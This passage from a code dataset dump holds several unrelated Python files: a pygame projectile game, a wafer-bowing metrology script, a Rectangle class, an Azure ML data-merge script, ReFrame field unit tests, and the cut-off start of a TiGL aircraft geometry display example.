ball.bottom = screen_height / 80 * 64\n ball.left = screen_width / 120 * 30.4\n lives -= 1\n\ndef update():\n global ball_velocity, ball_angle, lives, i\n if lives == 0:\n i = random.randrange(27, 36, 1)\n lives = 3\n if ball_velocity <= 7:\n ball_velocity = 7\n if ball_velocity > 20:\n ball_velocity = 20\n if ball_velocity <= 20:\n ball_velocity += ball_velocity_increment\n if ball_angle < -80:\n ball_angle = -80\n if ball_angle > 0:\n ball_angle = 0\n if ball_angle >= -80:\n ball_angle += ball_angle_increment\n\n\ndef completed():\n global background, player_x, walkcount\n if walkcount + 1 >= 27:\n walkcount = 0\n screen.blit(background, (0,0))\n screen.blit(launcher, (screen_width / 120 * 27 - int(launcher.get_width() / 4), screen_height / 120 * 95 - int(launcher.get_height() /2)))\n screen.blit(background, (0,0))\n screen.blit(launcher, (screen_width / 120 * 27 - int(launcher.get_width() / 4), screen_height / 120 * 95 - int(launcher.get_height() /2)))\n screen.blit(target, (screen_width * i/48, screen_height * 36/40))\n screen.blit(text_launcher, (screen_width *2 / 6, screen_height/8))\n screen.blit(astronaut, (screen_width * 4/6, screen_height / 60 *39))\n screen.blit(player_walking [walkcount//7], (player_x, player_y))\n screen.blit(door_frame, (screen_width * 46 / 100, screen_height * 66 / 100))\n player_x += 1.5\n walkcount += 1\n pygame.display.update()\n\n\n \n\ndef player_animation():\n global walkcount, player_x, i, font, text_launcher, walking, sound1, sound2, j, speech\n screen.blit(background, (0,0))\n screen.blit(launcher, (screen_width / 120 * 27 - int(launcher.get_width() / 4), screen_height / 120 * 95 - int(launcher.get_height() /2)))\n screen.blit(target, (screen_width * i/48, screen_height * 36/40))\n screen.blit(text_launcher, (screen_width *2 / 6, screen_height/8))\n screen.blit(astronaut, (screen_width * 4/6, screen_height / 60 *39))\n if walkcount + 1 >= 27:\n walkcount = 0\n if player_x < 0:\n player_x = 0\n if walking:\n screen.blit(player_walking [walkcount//7], (player_x, player_y))\n walkcount += 1\n if walking == False:\n screen.blit(player_standing, (player_x, player_y))\n if player_x > screen_width / 100 * 41:\n player_x = screen_width / 100 * 41\n if j == 1:\n speech = speech_1\n screen.blit(speech, (screen_width * 3/8, screen_height * 3/8))\n pygame.display.flip()\n sound1.play()\n pygame.time.delay(12000)\n sound2.play()\n pygame.time.delay(14000)\n fill()\n screen.blit(speech_2, (screen_width * 3/8, screen_height * 3/8))\n pygame.display.flip()\n sound3.play()\n pygame.time.delay(3000)\n fill()\n screen.blit(speech_3, (screen_width * 3/8, screen_height * 3/8))\n pygame.display.flip()\n pygame.time.delay(3000)\n fill()\n screen.blit(speech_4, (screen_width * 3/8, screen_height * 3/8))\n pygame.display.flip()\n fill()\n pygame.time.delay(3000)\n screen.blit(speech_5, (screen_width * 3/8, screen_height * 3/8))\n pygame.display.flip()\n pygame.time.delay(3800)\n fill()\n screen.blit(speech_6, (screen_width * 3/8, screen_height * 3/8))\n pygame.display.flip()\n pygame.time.delay(3000)\n fill()\n text_launcher = font.render(\"Press Enter At Launcher\", 40, (200,0,0))\n j = 0\n if j == 0:\n if player_x < screen_width / 100 * 25 and player_x > screen_width / 100:\n border = pygame.Rect(screen_width / 100 * 15, screen_height / 100 * 66, 215, 26)\n pygame.draw.rect(screen, (0,0,0), border)\n text_enter = font.render(\"[Press Enter Here]\", 30, (255,255,255))\n screen.blit(text_enter, (screen_width / 100 * 15, screen_height / 100 * 66))\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n intro = False\n playing = True\n \n pygame.display.update()\n\ndef fill():\n global player_x\n screen.blit(background, (0,0))\n screen.blit(launcher, (screen_width / 120 * 27 - int(launcher.get_width() / 4), screen_height / 120 * 95 - int(launcher.get_height() /2)))\n screen.blit(target, (screen_width * i/48, screen_height * 36/40))\n screen.blit(text_launcher, (screen_width *2 / 6, screen_height/8))\n screen.blit(astronaut, (screen_width * 4/6, screen_height / 60 *39))\n screen.blit(player_standing, (player_x, player_y))\n\n\n\n\n# General Set up\npygame.init()\nclock = pygame.time.Clock()\n\n#Setting up main window\n\nscreen_width = 800\nscreen_height = 600\nscreen = pygame.display.set_mode((screen_width,screen_height))\npygame.display.set_caption('projectile')\ni = 35\nj = 1\n\n#Graphics\ntarget = pygame.image.load('Target(1).png')\ntarget_rect = pygame.Rect(screen_width * i/48, screen_height * 70/72, target.get_width() - 2, 1)\n\nwall = pygame.Rect(screen_width / 120 * 60, screen_height * 66/100, screen_width / 120 * 5, screen_height * 34/100)\nball = pygame.Rect(screen_width / 120 * 30.4,screen_height / 80 * 64,15 ,15)\nline = pygame.Rect(screen_width / 120 * 28,screen_height / 80 * 65,50, 3)\n\ngravity = 9.8\n\nball_speed_x = 0\nball_speed_y = 0\nball_angle_increment = 0\nball_angle = 0\nball_velocity_increment = 0\nball_velocity = 7\ngravity = 9.8\nlives = 3\n\n\nlauncher = pygame.image.load('Projectile-Launcher.png')\nbackground = pygame.image.load('ChallengeRoom1.jpg')\nbackground_game = pygame.image.load('ChallengeRoom1(game scene).jpg')\ndoor_frame = pygame.image.load('DoorFrame.png')\nastronaut = pygame.image.load('astronaut instructor.png')\n\nspeech_1 = pygame.image.load(\"IntroText(1).png\")\nspeech_2 = pygame.image.load(\"IntroText(2).png\")\nspeech_3 = pygame.image.load(\"IntroText(3).png\")\nspeech_4 = pygame.image.load(\"IntroText(4).png\")\nspeech_5 = pygame.image.load(\"IntroText(5).png\")\nspeech_6 = pygame.image.load(\"IntroText(6).png\")\n\nsound1 = pygame.mixer.Sound('Part-1.wav')\nsound2 = pygame.mixer.Sound('Part-2.wav')\nsound3 = pygame.mixer.Sound('Part-3.wav')\nsound4 = pygame.mixer.Sound('Part-4_1.wav')\nsound5 = pygame.mixer.Sound('Part-5_1.wav')\n\n\nplayer_walking = [pygame.image.load('charv2(1).png'), pygame.image.load('charv2(2).png'), pygame.image.load('charv2(3).png'), pygame.image.load('charv2(4).png')]\nplayer_standing = pygame.image.load('charv2(5).png')\nplayer_width = 110\nplayer_height = 160\nplayer_vel = 5\nwalkcount = 0\nplayer_x = 0\nplayer_y = screen_height / 60 *43\nwalking = False\n\nbg_color = pygame.Color('grey12')\nlight_grey = (200,200,200)\n\nfont = pygame.font.SysFont(\"comicsans\", 30, True)\ntext_launcher = font.render(\"\", 40, (200,0,0))\n\n#Stages\nintro = True\nplaying = False\n\n\nwhile True:\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n \n while intro:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n \n \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n player_x -= 1.5\n walking = True\n if event.key == pygame.K_RIGHT:\n player_x += 1.5\n walking = True\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n walking = False\n if event.key == pygame.K_RIGHT:\n walking = False\n if event.key == pygame.K_RETURN:\n if player_x < screen_width / 100 * 25 and player_x > screen_width / 100 * 18:\n intro = False\n playing = True\n break\n\n \n player_animation()\n clock.tick(60)\n\n\n# Key Actions\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_DOWN:\n ball_angle_increment += 0.02 \n if event.key == pygame.K_UP:\n ball_angle_increment -= 0.02\n if event.key == pygame.K_LEFT:\n ball_velocity_increment -= 0.01\n if event.key == pygame.K_RIGHT:\n ball_velocity_increment += 0.01\n if event.key == pygame.K_RETURN:\n if ball_speed_x == 0 or ball_speed_y == 0:\n ball_speed_x = ball_velocity * math.cos(ball_angle * math.pi/180)\n ball_speed_y = ball_velocity * math.sin(ball_angle * math.pi/180)\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_DOWN:\n ball_angle_increment = 0\n if event.key == pygame.K_UP:\n ball_angle_increment = 0\n if event.key == pygame.K_LEFT:\n ball_velocity_increment = 0\n if event.key == pygame.K_RIGHT:\n ball_velocity_increment = 0\n ball_animation()\n update()\n ball_speed_y += gravity/60 \n\n\n #Launcher Animation\n #launcher_copy = pygame.transform.rotate(launcher, -1 * ball_angle)\n #screen.blit(launcher_copy, (screen_width / 120 * 27 - int(launcher_copy.get_width() / 4), screen_height / 120 * 95 - int(launcher_copy.get_height() /2)))\n \n \n\n \n ball_animation()\n update()\n #ball_velocity += ball_velocity_increment\n ball_speed_y += gravity/60 \n \n \n #Visuals\n \n #screen.fill(bg_color)\n #screen.blit(background, (0,0))\n #screen.blit(target, (screen_width * i/48, screen_height * 36/40))\n #target_rect = pygame.Rect(screen_width * i/48, screen_height * 69/72, target.get_width(), 2)\n #pygame.draw.ellipse(screen, (0,200,200), ball)\n #pygame.draw.rect(screen, (0,0,0), line)\n #text = font.render(\"Angle \" + str(-1 * ball_angle), 30, (200,0,0))\n #text1 = font.render(\"Velocity \" + str(ball_velocity), 30, (200,0,0))\n #textlives = font.render(\"Lives Left: \" + str(lives), 30, (200,0,0))\n #screen.blit(textlives, (screen_width * 6/8, screen_height * 1/12))\n #screen.blit(text1, (screen_width/6, screen_height/8))\n #screen.blit(text, (screen_width/6, screen_height/12))\n #Launcher Animation\n #launcher_copy = pygame.transform.rotate(launcher, -1 * ball_angle)\n #screen.blit(launcher_copy, (screen_width / 120 * 27 - int(launcher_copy.get_width() / 4), screen_height / 120 * 95 - int(launcher_copy.get_height() /2)))\n \n\n pygame.display.flip()\n clock.tick(30)\n\n","sub_path":"CernProjectile.py","file_name":"CernProjectile.py","file_ext":"py","file_size_in_byte":12657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"34979633","text":"import sys\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nimport scipy as sp\n\n#call this with the input data file as a command line arguement\n\ndef getData():\n\n\tfilename = sys.argv[1]\n\tif filename.find('.ASC') < 0: sys.exit(\"File \"+filename+\" does not exist.\")\n\tdf = pd.read_csv(filename,encoding = \"utf-8\",sep='\\t')\n\treturn df\n\ndef cleanData(df):\n\tdf = df[df['Z'].notna()]\n\tdf = df[df['Z']!='Bad']\n\treturn df\n\ndef make13x13(data):\n\t#trim off edges of sensor (might need to increase the trim a bit for different sensor types)\n\t#find max X and Y\n\tmaxX = data['X'].max()\n\tmaxY = data['Y'].max()\n\tX_low = 0.1*maxX\n\tX_high = 0.9*maxX\n\tY_low = 0.1*maxY\n\tY_high = 0.9*maxY\n\n\tgrid13x13_xy = []\n\t#based on low and high X/Y, find 13x13 x,y coordinates for grid\n\tfor i in range(1,14):\n\t\tX_range = X_high-X_low\n\t\txpoint = round((i/21)*X_range,3)\n\t\tfor i in range(1,14):\n\t\t\tY_range = Y_high-Y_low\n\t\t\typoint = round((i/13)*Y_range,3)\n\t\t\tgrid13x13_xy.append([xpoint,ypoint])\n\n\tgrid13x13Z = []\n\t#find the nearest x,y the profilometer recorded to the x,y coordinates found above\n\ttry:\n\t\tfor coordinate in grid13x13_xy:\n\t\t\tmin_index = data['X'].sub(coordinate[0]).abs().idxmin()\n\t\t\tmax_index = data['X'].sub(coordinate[0]).abs().idxmax()\n\t\t\tdata_tmp = data[min_index:max_index]\n\t\t\ty_index = data_tmp['Y'].sub(coordinate[1]).abs().idxmin()\n\t\t\tgrid13x13Z.append([data['X'][min_index],data['Y'][y_index],data['Z'][y_index]])\n\texcept ValueError:\n\t\tpass\n\n\treturn grid13x13Z\n\ndef removeTilt(df):\n\t#df = pd.DataFrame(grid,columns = ['X','Y','Z'])\n\t#df['Z'] = round(df['Z'].astype(np.float)/1000,3)\n\n\t#fit to a plane\n\tY = df['Z']\n\tX = df[['X','Y']]\n\tX = X.to_numpy()\n\tX = X.astype(np.float)\n\tY = Y.astype(np.float)\n\ta = np.linalg.solve(np.dot(X.T,X),np.dot(X.T,Y))\n\tpredictedY = np.dot(X,a)\n\tpredictedY = predictedY\n\tZprime = predictedY.tolist()\n\tdf['Znew'] = Zprime\n\tdf[\"Z'\"] = (df['Znew'] - df['Z'])\n\tdf.drop(columns=['Znew'])\n\n\treturn df\n\ndef calculateBow(grid,outfile):\n\tdf = pd.DataFrame(grid,columns = ['X','Y','Z'])\n\tdf['Z'] = round(df['Z'].astype(np.float)/1000,3) #Z is in nm instead of um unlike X, Y\n\t#df['X'] = round(df['X'].astype(np.float),3)\n\t#df['Y'] = round(df['Y'].astype(np.float),3)\n\tmaxZ = df['Z'].astype(np.float).max()\n\tminZ = df['Z'].astype(np.float).min()\n\tbow = maxZ - minZ\n\n\tif len(sys.argv) >= 3: #if the data does not already have the tilt removed,\n\t\tdf = removeTilt(df)\n\t\tdf.drop(['Znew'], axis=1)\n\t\tdf[\"Z'\"] = round(df[\"Z'\"],3)\n\t\tmaxZdiff = df[\"Z'\"].max()\n\t\tminZdiff = df[\"Z'\"].min()\n\t\tbow = maxZdiff - minZdiff\n\telse:\n\t\tdf[\"Z'\"] = df['Z']\n\tdf['X'] = round(df['X'],3)\n\tdf['Y'] = round(df['Y'],3)\n\tcols = [\"X\",\"Y\",\"Z\",\"Z'\"]\n\tdf.to_csv(outfile,columns=cols,mode='a',index=False)\n\t#return bow,df\n\tif bow < 150:\n\t\tprint('Acceptable bowing of ',bow)\n\telse: print('Bowing too large: ',bow)\n\ndef header():\n\t#ask header questions\n\tsensors = {'R0',\"R1\",\"R2\",\"R3\",\"R4\",\"R5\"}\n\tsensor_type = input('Enter sensor type: ')\n\tif sensor_type not in sensors: sys.exit('Not a sensor type.')\n\n\tbatch = input('Enter batch number: ')\n\twafer = input('Enter Wafer #: ')\n\ttoday = datetime.today().strftime('%d %B %Y')\n\ttime = datetime.now().strftime('%H:%M:%S')\n\n\tuser = input('Enter user: ')\n\tusers = ['alyssa','graham','luise','scott','xavier']\n\tif (user.lower() not in users): sys.exit('Unknown user')\n\n\ttemp = input('Enter temperature: ')\n\tif (float(temp) < 16.5) or (float(temp) > 21.5): sys.exit('Unallowable temperature.')\n\n\thumidity = input('Enter humidity: ')\n\tif float(humidity) > 20.: sys.exit('Unallowable humidity.')\n\n #write heading using user inputs\n\n\toutfile = batch+'_'+wafer+\"_metrology.dat\"\n\tout = open(outfile,'w')\n\n\tout.write('Type: '+sensor_type+'\\n')\n\tout.write('Batch: '+batch+'\\n')\n\tout.write('Wafer: '+wafer+'\\n')\n\tout.write('Date: '+today+'\\n')\n\tout.write('Time: '+time+'\\n')\n\tout.write('Institute: SFU'+'\\n')\n\tout.write('User: '+user+'\\n')\n\tout.write('TestType: SENSOR_METROLOGY'+'\\n')\n\tout.write('Temperature: '+temp+'\\n')\n\tout.write('Humidity: '+humidity+'\\n')\n\tout.write('\\n')\n\n\tout.close()\n\n\treturn outfile\n\ndef main():\n\n\toutfile = header()\n\tdata = getData()\n\tdata = cleanData(data)\n\tgrid = make13x13(data)\n\tcalculateBow(grid,outfile)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bowing.py","file_name":"bowing.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"27409597","text":"#!/usr/bin/python3\n\"\"\" rectangle class \"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" Rectangle class \"\"\"\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" rectangle constructor \"\"\"\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n @property\n def width(self):\n \"\"\" width getter \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" width setter \"\"\"\n if type(value) is not int:\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value\n\n @property\n def height(self):\n \"\"\" height getter \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" height setter \"\"\"\n if type(value) is not int:\n raise TypeError(\"height must be an integer\")\n if value <= 0:\n raise ValueError(\"height must be > 0\")\n self.__height = value\n\n @property\n def x(self):\n \"\"\" x getter \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" x setter \"\"\"\n if type(value) is not int:\n raise TypeError(\"x must be an integer\")\n if value < 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = value\n\n @property\n def y(self):\n \"\"\" y getter \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" y setter \"\"\"\n if type(value) is not int:\n raise TypeError(\"y must be an integer\")\n if value < 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = value\n\n def area(self):\n \"\"\" rectangle area \"\"\"\n return self.__width * self.__height\n\n def display(self):\n \"\"\" print # rectangle \"\"\"\n print(\"\\n\" * self.__y, end=\"\")\n for i in range(self.__height):\n print(\"{}{}\".format(\" \" * self.__x, \"#\" * self.__width))\n\n def __str__(self):\n \"\"\" str func \"\"\"\n return \"[{}] ({}) {}/{} - {}/{}\".format(\n type(self).__name__, self.id, self.__x,\n self.__y, self.__width, self.__height)\n\n def update(self, *args, **kwargs):\n \"\"\" args and kwargs \"\"\"\n attrib = [\"id\", \"width\", \"height\", \"x\", \"y\"]\n if len(args) > 0:\n for i, arg in enumerate(args):\n setattr(self, attrib[i], arg)\n else:\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n def to_dictionary(self):\n \"\"\" rectangle to dictionary \"\"\"\n dic = {}\n attrib = [\"id\", \"width\", \"height\", \"x\", \"y\"]\n for i in attrib:\n dic[i] = getattr(self, i)\n return(dic)\n","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"66655748","text":"import sys\nfrom handler import *\nfrom core.common.tasks.gcloud_operation import dates_range\nimport datetime\n\n# Default date\nYESTERDAY = (datetime.date.today() - datetime.timedelta(1)).strftime('%Y%m%d')\n# Use dates_range to generate range of dates\n# If date arguments are passed when calling script\ntry:\n\tDATES = dates_range(sys.argv[1], sys.argv[2])\nexcept IndexError:\n\tDATES = [YESTERDAY]\n\nQUERY = open('user_interest.sql', 'r').read()\nDESTINATION_TABLE_ID = 'catalog_analysis_user_interest_analysis'\n\nreport = ReportHandler(QUERY, DESTINATION_TABLE_ID, DATES)\nreport.start()\nreport.join()\n","sub_path":"user_interest/user_interest.py","file_name":"user_interest.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"137100234","text":"#%%\nimport pandas as pd\nimport numpy as np\nimport re\nfrom azureml.core import Workspace, Dataset, workspace\n\nworkspace = Workspace.from_config()\n\n# %% Get datasets from ML workspace\nweather = Dataset.get_by_name(workspace, name='all_weather')\ncovid = Dataset.get_by_name(workspace, name='us_state_covid')\nflights = Dataset.get_by_name(workspace, name='all_flights')\n\n# %% Convert to pandas dataframes\nweather = weather.to_pandas_dataframe().iloc[:, 1:]\ncovid = covid.to_pandas_dataframe()\nflights = flights.to_pandas_dataframe().iloc[:, 1:]\n\n# %% Percent null function\ndef percent_null(df):\n\treturn df.apply(lambda x: sum(x.isnull())/x.fillna(0).count())\n\ndef strip_str_cols(df):\n\tdf_str_cols = df.dtypes == object\n\tdf.loc[:, df_str_cols] = df.loc[:, df_str_cols].apply(lambda x: x.str.strip())\n\n# %% Weather data\nweather.info()\n# Calculate percent missing/null for each column and drop unwanted columns\npercent_null(weather)\n\n# weather.drop(columns=['Column2'], inplace=True)\nweather.rename(columns=lambda x: x.lower(), inplace=True)\n\n# %% Covid data\ncovid['date'] = pd.to_datetime(covid['date'], format=r'%Y%m%d')\n\ncovid.info()\n# Calculate percent missing/null for each column\npercent_null(covid)\n\nstrip_str_cols(covid)\n\n# %% Flights data\nflights.info()\npercent_null(flights)\n\n# Clean flight column names\nflights.rename(columns={'Date_(MM/DD/YYYY)': 'date'}, inplace=True)\nflights.rename(columns=lambda x: re.sub(r'^(.+)_\\((.+)\\)$', r'\\1_\\2', x.lower()), inplace=True)\nflights.rename(columns=lambda x: x.strip().replace(r' ', '_'), inplace=True)\nflights.rename(columns={\n\t'city': 'destination_city', \n\t'state': 'destination_state', \n\t'airport_code': 'destination_airprt_code',\n\t'airport_name': 'destination_airprt_name'\n}, inplace=True)\n\nflights = flights.drop(\n\tcolumns=[\n\t\t'carrier_code', 'flight_number', 'departure_airprt_code',\n\t\t'scheduled_elapsed_time_minutes', 'actual_elapsed_time_minutes',\n\t\t'taxi-out_time_minutes', \n\t\t'tail_number', 'destination_airport', 'scheduled_departure_time',\n\t\t'actual_departure_time', 'wheels-off_time', 'destination_airprt_code',\n\t\t'destination_city', 'destination_state', 'destination_airprt_name'\n\t]\n).iloc[:-1,]\n\nstrip_str_cols(flights)\n# flights['flight_number'] = flights['flight_number'].apply(lambda x: re.sub(r'\\.\\d+$', '', x))\n\n# %% Aggregate by date and departure airport\nflights_grp = flights.groupby(by=['date' , 'departure_state', 'departure_airport'])\n\nflights_agg = flights_grp.agg(\n\ttotal_daily_flights=('year', 'count'),\n\tavg_delay_carrier=('delay_carrier_minutes', np.mean),\n\tavg_delay_weather=('delay_weather_minutes', np.mean),\n\tavg_national_avi_system=('delay_national_aviation_system_minutes', np.mean),\n\tavg_delay_security=('delay_security_minutes', np.mean),\n\tavg_delay_late_aircraft=('delay_late_aircraft_arrival_minutes', np.mean),\n\tdeparture_airport_name=('departure_airport_name', 'first')\n).reset_index()\n\n# %% Join data with validation\nfull_df = pd.merge(\n\tflights_agg, covid, how='left', \n\tleft_on=['date', 'departure_state'], right_on=['date', 'state'], \n\tvalidate='many_to_one'\n).drop(columns=['state'])\n\nfull_df = pd.merge(\n\tfull_df, weather, how='left', \n\tleft_on=['date', 'departure_airport'], right_on=['date', 'airport_code'], \n\tvalidate='many_to_one'\n).drop(columns=['airport_code'])\n\n# Write to local storage\nfull_df.to_csv('../../data/final_data/full_df.csv')\n\n# upload the local file from src_dir to the target_path in default datastore\ndatastore = workspace.get_default_datastore()\ndatastore.upload(src_dir='../../data/final_data/', target_path='')\n\n","sub_path":"lib/data/full_data_merged.py","file_name":"full_data_merged.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"73351929","text":"import os\nimport unittest\n\nimport reframe.core.fields as fields\nfrom reframe.utility import ScopedDict\n\n\nclass TestFields(unittest.TestCase):\n def test_not_set_attribute(self):\n class FieldTester:\n var = fields.Field('var')\n\n c = FieldTester()\n self.assertRaises(AttributeError, exec, \"a = c.var\",\n globals(), locals())\n self.assertRaises(AttributeError, getattr, c, 'var')\n\n def test_copy_on_write_field(self):\n class FieldTester:\n cow = fields.CopyOnWriteField('cow')\n\n tester = FieldTester()\n var = [1, [2, 4], 3]\n\n # Set copy-on-write field\n tester.cow = var\n\n # Verify that the lists are different\n self.assertIsNot(var, tester.cow)\n\n # Make sure we have a deep copy\n var[1].append(5)\n self.assertEqual(tester.cow, [1, [2, 4], 3])\n self.assertIsInstance(FieldTester.cow, fields.CopyOnWriteField)\n\n def test_constant_field(self):\n class FieldTester:\n ro = fields.ConstantField('foo')\n\n tester = FieldTester()\n self.assertEqual(FieldTester.ro, 'foo')\n self.assertEqual(tester.ro, 'foo')\n self.assertRaises(ValueError, exec, \"tester.ro = 'bar'\",\n globals(), locals())\n\n def test_typed_field(self):\n class ClassA:\n def __init__(self, val):\n self.value = val\n\n class ClassB(ClassA):\n def __init__(self):\n super().__init__(10)\n\n class FieldTester:\n field = fields.TypedField('field', ClassA)\n field_any = fields.TypedField('field_any', ClassA, str, type(None))\n\n def __init__(self, value):\n self.field = value\n\n tester = FieldTester(ClassA(3))\n self.assertIsInstance(FieldTester.field, fields.TypedField)\n self.assertEqual(3, tester.field.value)\n self.assertRaises(TypeError, FieldTester, 3)\n\n tester.field = ClassB()\n self.assertEqual(10, tester.field.value)\n with self.assertRaises(TypeError):\n tester.field = None\n\n tester.field_any = None\n tester.field_any = 'foo'\n tester.field_any = ClassA(5)\n with self.assertRaises(TypeError):\n tester.field_any = 3\n\n def test_timer_field(self):\n class FieldTester:\n field = fields.TimerField('field')\n field_maybe_none = fields.TimerField(\n 'field_maybe_none', type(None))\n\n tester = FieldTester()\n tester.field = (65, 22, 47)\n tester.field_maybe_none = None\n\n self.assertIsInstance(FieldTester.field, fields.TimerField)\n self.assertEqual((65, 22, 47), tester.field)\n self.assertRaises(TypeError, exec, 'tester.field = (2,)',\n globals(), locals())\n self.assertRaises(TypeError, exec, 'tester.field = (2, 2)',\n globals(), locals())\n self.assertRaises(TypeError, exec, 'tester.field = (2, 2, 3.4)',\n globals(), locals())\n self.assertRaises(TypeError, exec, \"tester.field = ('foo', 2, 3)\",\n globals(), locals())\n self.assertRaises(TypeError, exec, 'tester.field = 3',\n globals(), locals())\n self.assertRaises(ValueError, exec, 'tester.field = (-2, 3, 5)',\n globals(), locals())\n self.assertRaises(ValueError, exec, 'tester.field = (100, -3, 4)',\n globals(), locals())\n self.assertRaises(ValueError, exec, 'tester.field = (100, 3, -4)',\n globals(), locals())\n self.assertRaises(ValueError, exec, 'tester.field = (100, 65, 4)',\n globals(), locals())\n self.assertRaises(ValueError, exec, 'tester.field = (100, 3, 65)',\n globals(), locals())\n\n def test_proxy_field(self):\n class Target:\n def __init__(self):\n self.a = 1\n self.b = 2\n\n t = Target()\n\n class Proxy:\n a = fields.ForwardField(t, 'a')\n b = fields.ForwardField(t, 'b')\n\n proxy = Proxy()\n self.assertIsInstance(Proxy.a, fields.ForwardField)\n self.assertEqual(1, proxy.a)\n self.assertEqual(2, proxy.b)\n\n proxy.a = 3\n proxy.b = 4\n self.assertEqual(3, t.a)\n self.assertEqual(4, t.b)\n\n def test_deprecated_field(self):\n from reframe.core.exceptions import ReframeDeprecationWarning\n\n class FieldTester:\n value = fields.DeprecatedField(fields.TypedField('value', int),\n 'value field is deprecated')\n _value = fields.TypedField('value', int)\n ro = fields.DeprecatedField(fields.TypedField('ro', int),\n 'value field is deprecated',\n fields.DeprecatedField.OP_SET)\n _ro = fields.TypedField('ro', int)\n wo = fields.DeprecatedField(fields.TypedField('wo', int),\n 'value field is deprecated',\n fields.DeprecatedField.OP_GET)\n\n def __init__(self):\n self._value = 1\n self._ro = 2\n self.wo = 3\n\n tester = FieldTester()\n\n # Test set operation\n with self.assertWarns(ReframeDeprecationWarning):\n tester.value = 2\n\n with self.assertWarns(ReframeDeprecationWarning):\n tester.ro = 1\n\n try:\n tester.wo = 20\n except ReframeDeprecationWarning:\n self.fail('deprecation warning not expected here')\n\n # Test get operation\n try:\n a = tester.ro\n except ReframeDeprecationWarning:\n self.fail('deprecation warning not expected here')\n\n with self.assertWarns(ReframeDeprecationWarning):\n a = tester.value\n\n with self.assertWarns(ReframeDeprecationWarning):\n a = tester.wo\n\n def test_absolute_path_field(self):\n class FieldTester:\n value = fields.AbsolutePathField('value', type(None))\n\n def __init__(self, value):\n self.value = value\n\n tester = FieldTester('foo')\n self.assertEqual(os.path.abspath('foo'), tester.value)\n\n # Test set with an absolute path already\n tester.value = os.path.abspath('foo')\n self.assertEqual(os.path.abspath('foo'), tester.value)\n\n # This should not raise\n tester.value = None\n with self.assertRaises(TypeError):\n tester.value = 1\n\n def test_scoped_dict_field(self):\n class FieldTester:\n field = fields.ScopedDictField('field', int)\n field_maybe_none = fields.ScopedDictField(\n 'field_maybe_none', int, type(None))\n\n tester = FieldTester()\n\n # Test valid assignments\n tester.field = {\n 'a': {'k1': 1, 'k2': 2},\n 'a:b': {'k1': 3, 'k3': 4},\n 'a:b:c': {'k2': 5, 'k3': 6},\n '*': {'k1': 7, 'k3': 9, 'k4': 10}\n }\n tester.field_maybe_none = None\n\n # Check that we have indeed a ScopedDict here\n self.assertIsInstance(FieldTester.field, fields.ScopedDictField)\n self.assertIsInstance(tester.field, ScopedDict)\n self.assertEqual(10, tester.field['a:k4'])\n\n # Test invalid assignments\n self.assertRaises(TypeError, exec,\n 'tester.field = {1: \"a\", 2: \"b\" }',\n globals(), locals())\n self.assertRaises(TypeError, exec,\n \"tester.field = [('a', 1), ('b', 2)]\",\n globals(), locals())\n self.assertRaises(TypeError, exec,\n '''tester.field = {'a': {1: 'k1'},\n 'b': {2: 'k2'}}''',\n globals(), locals())\n\n # Test assigning a ScopedDict already\n tester.field = ScopedDict({})\n","sub_path":"unittests/test_fields.py","file_name":"test_fields.py","file_ext":"py","file_size_in_byte":8139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231790466","text":"from __future__ import print_function\n\nfrom tixi3 import tixi3wrapper\nfrom tigl3 import tigl3wrapper\nimport tigl3.configuration, tigl3.geometry, tigl3.boolean_ops, tigl3.exports\nimport os\n\ndef display_configuration(tigl_handle):\n \"\"\"\n This is an example how to use the internal tigl/pyocc API\n to display all wing and fuselage segments\n \"\"\"\n\n from OCC.Display.SimpleGui import init_display\n\n # get the configuration manager\n mgr = tigl3.configuration.CCPACSConfigurationManager_get_instance()\n\n # get the CPACS configuration, defined by the tigl handle\n # we need to access the underlying tigl handle (that is used in the C/C++ API)\n config = mgr.get_configuration(tigl_handle._handle.value)\n\n display, start_display, add_menu, add_function_to_menu = init_display()\n\n for ifuse in range(1, config.get_fuselage_count() + 1):\n fuselage = config.get_fuselage(ifuse)\n for isegment in range(1, fuselage.get_segment_count() + 1):\n segment = fuselage.get_segment(isegment)\n display.DisplayShape(segment.get_loft().shape(), update=True)\n\n mirrored_shape = segment.get_mirrored_loft()\n if mirrored_shape is not None:\n display.DisplayShape(mirrored_shape.shape(), update=True)\n\n for iwing in range(1, config.get_wing_count() + 1):\n wing = config.get_wing(iwing)\n\n for isegment in range(1, wing.get_segment_count() + 1):\n segment = 